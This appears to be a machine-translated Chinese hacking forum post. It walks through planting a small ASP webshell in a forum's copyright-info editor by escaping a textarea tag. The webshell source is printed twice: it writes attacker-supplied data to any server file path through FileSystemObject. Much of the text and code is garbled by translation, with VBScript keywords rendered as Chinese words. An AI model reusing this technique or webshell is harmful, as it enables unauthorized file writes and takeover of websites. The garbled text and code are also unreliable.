由蚊子原创的编辑代码逃脱漏洞
点评:几天的溜冰鞋把我这些天无聊看论坛,如果你能得到一个webshell好的版权信息使他变成了一匹小马。
成功保存
但是它没有被执行。
这应该是马的问题。
不,当然,这不会发生在你身上。
注意命令成功!非法操作!这个快用完了
我的马真的很长了,真的很奇怪吗
为了了解发生了什么,人们进行了研究。
看我的马码,注意红色记号。
大小= 53 >
蚊子
<
昏暗的objfso
昏暗的fdat
昏暗的objcountfile
下次继续出错
集objfso = server.createobject(脚本。FileSystemObject )
如果修剪(请求(syfdpath ))< >然后
fdata =请求(cyfddata )
集objcountfile = objfso.createtextfile(请求(syfdpath ),真的)
objcountfile写fdata。
如果错误=0,则为% >
命令成功完成!
非法操作!
<
最后如果
err.clear
最后如果
objcountfile。关闭
集objcountfile =没有
集objfso =没有
%>
查看网页的源代码并注意橙色标记。
论坛版权信息
体{
过滤器:ProgID:DXImageTransform.Microsoft.Gradient(梯度型= 0,startcolorstr = # 808080,# endcolorstr = 000);
颜色:# FFF;
字体大小:9pt
}
U3000
U3000
大小= 53 >
蚊子
<
昏暗的objfso
昏暗的fdat
昏暗的objcountfile
下次继续出错
集objfso = server.createobject(脚本。FileSystemObject )
如果修剪(请求(syfdpath ))< >然后
fdata =请求(cyfddata )
集objcountfile = objfso.createtextfile(请求(syfdpath ),真的)
objcountfile写fdata。
如果错误=0,则为% >
命令成功完成!
非法操作!
<
最后如果
err.clear
最后如果
objcountfile。关闭
集objcountfile =没有
集objfso =没有
%>
我看不见。
让我解释一下。
查看Web页面的源代码。
这是文本框的开始标记。
在我的小马,有一个标志在一个文本框的结尾。
所以浏览器是
下面的代码被解释为文本框外的位置。
这相当于把下面的代码写进了编辑页面。
理解它
这对我们很有用。
使用
添加到小马的顶部
保存
然后重新编辑
在这一点上,我们的小马已经'写'的编辑页。
你不必说其余的…匆忙。
PS:不仅是一个动态的网络,而且其他系统也有类似的漏洞。
不要在这里停下来,在这里停下来…认为我们可以…
不能跑,这要看你的马了。